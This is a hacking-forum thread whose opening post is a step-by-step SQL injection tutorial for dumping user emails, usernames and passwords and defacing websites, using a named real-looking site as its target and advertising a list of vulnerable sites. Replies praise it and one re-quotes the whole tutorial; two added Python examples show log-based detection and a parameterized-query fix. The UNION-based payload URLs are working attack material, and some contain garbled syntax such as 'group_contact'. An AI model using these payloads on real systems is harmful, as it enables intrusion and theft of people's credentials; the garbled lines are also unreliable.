
Thread: SQL Injection - The Real Tutorial


  1. Join Date Sep 2010

    Posts 1,275

    Membership Banned

    Reputation: 933

    05-08-2011 04:46 AM #1 SQL Injection - The Real Tutorial

    SQL Injection



    Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

    I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is everywhere on the internet.


    So let's get started :y:

    What is SQL Injection?
    SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
    Source: [Only registered and activated users can see links. ]

    SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


    What can I gain from SQL Injecting a website?
    You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date, even Credit Card info, etc.)
    You can also gain Admin login. After you have that, you can finally deface the site


    [multipage=Getting Started/Finding a Target]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂


    So now you know what SQL injection is, now we can finally get in action :evil:

    First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
    So for me it would be: www.examplewebsite.com/index.php?id=1'
    Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
    or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting . If you get no error, the site is not vulnerable.

    Here is a nice tutorial by my friend Curt on how to find a vulnerable website Thanks to him :y:

    http://www.nextgenupdate.com/forums/...beginners.html

    [multipage=The 1st Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now here is the tutorial. Enjoy and follow all the steps to be successful

    So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information

    So my target today will be:
    Code:
    http://www.novebrno.net/article.php?id=616
    I tested it and it is vulnerable.

    Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself
    So the site should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--
    Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
    I tested it and I got an error at column 12:


    So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

    So now lets keep going.

    So now that we know the 11 available columns, we gotta find the vulnerable column. Just add:
    Code:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    at the end of the url

    NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

    Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
    But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

    So all we do now is add a - before the number. It should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Now I am getting an error and the number is showing:


    Number 5 is showing on my screen, so now we will keep going with this number.

    So now we have to replace the number 5 with @@version
    Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

    NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

    The URL should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--
    So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables

    IF the database is 4 and lower, it will be hard to get tables, more to read later.

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    Screenie of my database:



    So now we know the database version, now we need to get the tables names.
    To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

    NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... etc.

    The url should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
    Now you should get the Tables information.

    Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

    If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6, 7,8,9,10,11 from information_schema.tables+where+table_schema=datab ase()

    Now this should work and you should get all the tables information

    Some Tables should be:
    Code:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc
    Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

    So we add this at the end of the url:
    +UNION+SELECT+1,2,3,4,group_contact(column_name),6 ,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

    So it should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*
    So now lets say we got a 'admin' table, now we will change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin
    You can change the table_name=.. to any table you want to get information from.

    Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: [Only registered and activated users can see links. ] to convert the name admin into hax datas.

    Now change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e
    Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

    Now that will give us all the columns of the table admin. :y:

    Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username, 0x3a,password),3 from admin

    So it should look like:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin
    So now you finally have the passwords, emails and user names

    Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be a script kiddie ;D


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    Now as pointed out before, if your database is 4 and lower, you have a lil problem and it will be harder to get the tables.

    If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

    NOTE: If you have 5 available columns you will have to change it etc...

    Now if you get no error and you see the tables you are fine If not you are fuked and you will probably have to guess the tables

    Here are some known table names:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

    So now I will guess the table name admins on my test url:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin
    Now just keep guessing until you find a table name that works

    Now lets say the following table worked:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users
    Now we will have to guess the columns Yes this is a fuking pain in the ass I know

    Common columns names are:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

    So it should look like this:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users
    Now just keep guessing until one of the columns works.

    Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,p assword),3 from users

    So this will give us the information of the admin

    So this was the tutorial Hope you enjoyed

    [multipage=The 2nd Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

    So this time I will be using a test site, as I don't have time to look for the right vulnerable site
    My site will be called:
    Code:
    www.sqlitestsite.com/index.php/id=234
    So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=234 order by 1/*
    NOTE: You can also use -- instead of /*.

    Now this of course didn't give us an error, so we have to keep trying, just go on with:
    order by 2/*
    NO ERROR
    order by 3/*
    NO ERROR
    order by 4/*
    ERROR

    So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

    Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*
    Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*
    Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information

    So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*
    Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

    So now since there are different methods for the databases I will split now the tutorial.


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    So now we know that the database is version 5 and above. Now we need to find the tables.

    We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
    To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
    So it should look like:

    Code:
    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*
    Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

    Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

    Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

    Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

    To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information

    In order good tables are:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now we know the tables, now we need to find out the columns.

    To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    So now just replace 0,1 with 1,1, then with 2,1 and so on until you find a useful column as the following:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/
    So now we will get more information about the table "admin"

    So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

    The 0x3a is the hex for a ;.

    Now we will get the information and we are finally done with hacking a database version 5
    [multipage=Conclusion and some Goodies ;D]


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

    adding soon, gotta do P90x now ;D
    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂

    So guys this was my tutorial on how to SQL Inject websites I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [Only registered and activated users can see links. ]

    Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you


    Now since I am a nice guy, I will provide you guys with some goodies

    List of over 1500 vulnerable sites (found by me):
    DOWNLOAD LINK: [Only registered and activated users can see links. ]


    Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): http://www.nextgenupdate.com/forums/...injection.html


    Want to make a good defacement but you don't know html or php? Use this tool to do the work for you (Must be premium):
    http://www.nextgenupdate.com/forums/...e-creator.html
    Last edited by xTrYiPiCz; 06-12-2011 at 06:19 AM.
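
From the defender's side, the request sequence this post walks through (quote probe, ORDER BY column counting, UNION SELECT, information_schema reads, hex-encoded table names) leaves a recognisable trail in web server access logs. The following detection pass is an added example, not part of the original post; the log lines are constructed, and the rule names, the two-rule threshold and the function names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [08/May/2011:04:46:01 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 412
203.0.113.7 - - [08/May/2011:04:46:09 +0000] "GET /index.php?id=234+order+by+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/May/2011:04:46:12 +0000] "GET /index.php?id=234+order+by+2-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/May/2011:04:46:15 +0000] "GET /index.php?id=234+order+by+3-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/May/2011:04:46:19 +0000] "GET /index.php?id=234+order+by+4-- HTTP/1.1" 500 412
203.0.113.7 - - [08/May/2011:04:46:30 +0000] "GET /index.php?id=-234+union+all+select+1,2,3-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/May/2011:04:47:02 +0000] "GET /index.php?id=-234+union+all+select+1,table_name,3+from+information_schema.tables-- HTTP/1.1" 200 5300
203.0.113.7 - - [08/May/2011:04:47:40 +0000] "GET /index.php?id=-234+union+all+select+1,column_name,3+from+information_schema.columns+where+table_name=0x61646d696e-- HTTP/1.1" 200 5300
198.51.100.23 - - [08/May/2011:04:48:00 +0000] "GET /index.php?id=234 HTTP/1.1" 200 5120
198.51.100.23 - - [08/May/2011:04:48:05 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2048
198.51.100.23 - - [08/May/2011:04:48:09 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2048
"""

# client IP, request target, HTTP status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

# One rule per stage of the sequence described in the post (names are ours).
RULES = {
    "quote_probe": re.compile(r"'\s*$"),                        # id=1'
    "order_by_index": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),     # table_name=0x...
}


def scan(log_text):
    """Return {client_ip: {"rules": set, "order_by": [int], "server_errors": int}}."""
    findings = defaultdict(
        lambda: {"rules": set(), "order_by": [], "server_errors": 0}
    )
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        hit = False
        # parse_qsl decodes both '+' and %xx, so encoded probes are matched too.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for rule, pattern in RULES.items():
                found = pattern.search(value)
                if not found:
                    continue
                hit = True
                findings[ip]["rules"].add(rule)
                if rule == "order_by_index":
                    findings[ip]["order_by"].append(int(found.group(1)))
        # A 5xx answer to a matching request suggests SQL errors reach the client.
        if hit and status >= 500:
            findings[ip]["server_errors"] += 1
    return dict(findings)


def suspicious_clients(findings, min_rules=2):
    """Clients that matched several distinct stages; one stray hit is not enough."""
    return sorted(ip for ip, f in findings.items() if len(f["rules"]) >= min_rules)


def column_count_sweep(indexes):
    """True when ORDER BY indexes climb 1,2,3,... (column-count enumeration)."""
    return len(indexes) >= 3 and all(b == a + 1 for a, b in zip(indexes, indexes[1:]))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip in suspicious_clients(results):
        f = results[ip]
        print(ip, sorted(f["rules"]), "sweep:", column_count_sweep(f["order_by"]),
              "5xx:", f["server_errors"])
```

The search for "student union select committee" matches one rule but stays under the threshold, which is why the alert keys on several stages from the same client rather than on a single keyword.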

  2. gorgorn Gobble

    Join Date Jun 2011

    Posts 2

    Membership Standard

    Reputation: 20

    06-21-2011 08:28 PM #11


    wow.. great tutorial..:y::y:

    i have one question..

    how to make sql injection if the link of a website, there is no have integer number?

    i mean like this :
    Code:
    http://www.examplewebsite.com/index.php?id=ADMIN
    so, the is impossible to making SQL injection of these website..??

    sorry for my bad english...

  3. ᴬustin_Powers's Avatar

    ᴬustin_Powers Do I make you horny?

    Join Date Jan 2011

    Posts 643

    Membership Donator

    Reputation: 738

    06-21-2011 08:32 PM #12

    Quote Originally Posted by gorgorn View Post
    wow.. great tutorial..:y::y:

    i have one question..

    how to make sql injection if the link of a website, there is no have integer number?

    i mean like this :
    Code:
    http://www.examplewebsite.com/index.php?id=ADMIN
    so, the is impossible to making SQL injection of these website..??

    sorry for my bad english...
    You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.

  4. gorgorn Gobble

    Join Date Jun 2011

    Posts 2

    Membership Standard

    Reputation: 20

    06-21-2011 08:43 PM #13

    Quote Originally Posted by ᴬustin_Powers View Post
    You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.
    what is the different method?

    can u tell me more about these..??
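
For site owners, the fix is the same whether the parameter is an integer (`id=234`) or a string (`id=ADMIN`): the value is bound as a query parameter instead of being pasted into the SQL text, and database errors are never echoed to the visitor. The following before/after is an added example, not part of the thread; it uses an in-memory SQLite database as a stand-in for the MySQL sites discussed, and the table, column and function names are assumptions.

```python
import re
import sqlite3

INT_ID = re.compile(r"[0-9]{1,18}")  # plain ASCII digits, fits a 64-bit integer


def make_db():
    """Constructed in-memory stand-in for the site's database (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE articles (id INTEGER PRIMARY KEY, slug TEXT UNIQUE, title TEXT);
        INSERT INTO articles VALUES (234, 'ADMIN', 'Welcome');
        """
    )
    return db


def article_vulnerable(db, raw_id):
    """'Before': the request parameter becomes part of the SQL text."""
    try:
        sql = "SELECT id, slug, title FROM articles WHERE id = " + raw_id
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the driver's message is what turns a trailing quote
        # into a visible "error in your SQL syntax" page.
        return "DB error: %s" % exc


def article_hardened(db, raw_id):
    """'After': returns (http_status, rows); the input is only ever a bound value."""
    if INT_ID.fullmatch(raw_id):
        sql, arg = "SELECT id, slug, title FROM articles WHERE id = ?", int(raw_id)
    else:
        # String keys such as id=ADMIN are bound the same way; quotes, comment
        # markers and SQL keywords inside the value stay data.
        sql, arg = "SELECT id, slug, title FROM articles WHERE slug = ?", raw_id
    try:
        rows = db.execute(sql, (arg,)).fetchall()
    except sqlite3.Error:
        return 500, []  # log server-side; never send the driver's message out
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the thread: a normal id, the quote test, the UNION probe.
    for value in ("234", "ADMIN", "234'", "-234 union all select 1,2,3--"):
        print(repr(value))
        print("  before:", article_vulnerable(db, value))
        print("  after: ", article_hardened(db, value))
```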

  5. Join Date Jun 2011

    Posts 15

    Membership Standard

    Reputation: 70

    06-25-2011 04:05 PM #14

    Nice Post But I Already Know All This Stuff. :y:

  6. 2RAW4THESTREET's Avatar

    2RAW4THESTREET Hit the THANKS button. ;)

    Join Date Jan 2011

    Posts 1,349

    Membership Donator

    Reputation: 5300

    06-26-2011 12:45 PM #15

    Great tutorial bro. Well done.

  7. porsch3 Gobble

    Join Date Aug 2011

    Posts 1

    Membership Standard

    Reputation: 10

    08-13-2011 04:18 AM #16

    nice tutorial

  8. almyz125's Avatar

    almyz125 Save Point

    Join Date Jul 2010

    Posts 8

    Membership Donator

    Reputation: 10

    08-20-2011 02:44 PM #17

    Thanks for the tut.

  9. Ameht!'s Avatar

    Ameht! Dark Knight

    Join Date Jan 2010

    Posts 4,495

    Membership Donator

    Reputation: 754

    08-20-2011 02:56 PM #18

    Quote Originally Posted by xTrYiPiCz View Post
    SQL Injection



    Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

    I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is every where on the internet


    So lets get started :y:

    What is SQL Injection?
    SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
    Source: [Only registered and activated users can see links. ]

    SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


    What can I gain from SQL Injecting a website?
    You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info ect.)
    You can also gain Admin login. After you have that, you can finally deface the site


    [multipage=Getting Started/Finding a Target]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂


    So now you know what SQL injection is, now we can finally get in action :evil:

    First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
    So for me it would be: www.examplewebsite.com/index.php?id=1'
    Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
    or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting . If you get no error, the site is not vulnerable.

    Here is a nice tutorial by my friend Curt on how to find a vulnerable website Thanks to him :y:

    http://www.nextgenupdate.com/forums/...beginners.html

    [multipage=The 1st Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now here is the tutorial. Enjoy and follow all the steps to be successful

    So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information

    So my target today will be:
    Code:
    http://www.novebrno.net/article.php?id=616
    I tested it and it is vulnerable.

    Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself
    So the site should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--
    Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
    I tested it and I got an error at column 12:


    So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

    So now lets keep going.

    So now we now the 11 available columns, we gotta find the vulnerable column. Just add:
    Code:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    at the end of the url

    NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

    Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
    But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

    So all we do now is add a - before the number. It should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Now I am getting an error and the number is showing:


    Number 5 is showing on my screen, so now we will keep going with this number.

    So now we have to replace the number 5 with @@version
    Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

    NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

    The URL should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--
    So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables

    IF the database is 4 and lower, it will be hard to get tables, more to read later.

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    Screenie of my database:



    So now we know the database version, now we need to get the tables names.
    To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

    NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... ect.

    The url should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
    Now you should get the Tables information.

    Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

    If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6, 7,8,9,10,11 from information_schema.tables+where+table_schema=datab ase()

    Now this should work and you should get all the tables information

    Some Tables should be:
    Code:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc
    Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

    So we add this at the end of the url:r
    +UNION+SELECT+1,2,3,4,group_contact(column_name),6 ,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

    So it should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*
    So now lets say we got a 'admin' table, now we will change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin
    You can change the table_name=.. to any table you want to get information from.

    Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: [Only registered and activated users can see links. ] to convert the name admin into hax datas.

    Now change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e
    Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

    Now that will give us all the columns of the table admin. :y:

    Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username, 0x3a,password),3 from admin

    So it should look like:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin
    So now you finally have the passwords, emails and user names

    Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kidde ;D


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.

    If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

    NOTE: If you have 5 available columns you will have to change it ect...

    Now if you get no error and you see the tables you are fine If not you are fuked and you will probably have to guess the tables

    Here are some known table names:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

    So now I will guess the table name admins on my test url:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin
    Now just keep guessing until you find a table name that works

    Now lets say the following table worked:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users
    Now we will have to guess the columns Yes this is a fuking pain in the ass I know

    Common columns names are:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

    So it should look like this:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users
    Now just keep guessing until one of the columns works.

    Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,p assword),3 from users

    So this will give us the information of the admin

    So this was the tutorial Hope you enjoyed

    [multipage=The 2nd Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

    So this time I will be using a test site, as I don't have time to look for the right vulnerable site
    My site will be called:
    Code:
    www.sqlitestsite.com/index.php/id=234
    So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=234 order by 1/*
    NOTE: You can also use -- instead of /*.

    Now this of course didn't give us an error, so we have to keep trying, just go on with:
    order by 2/*
    NO ERROR
    order by 3/*
    NO ERROR
    order by 4/*
    ERROR

    So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

    Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*
    Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*
    Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information

    So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*
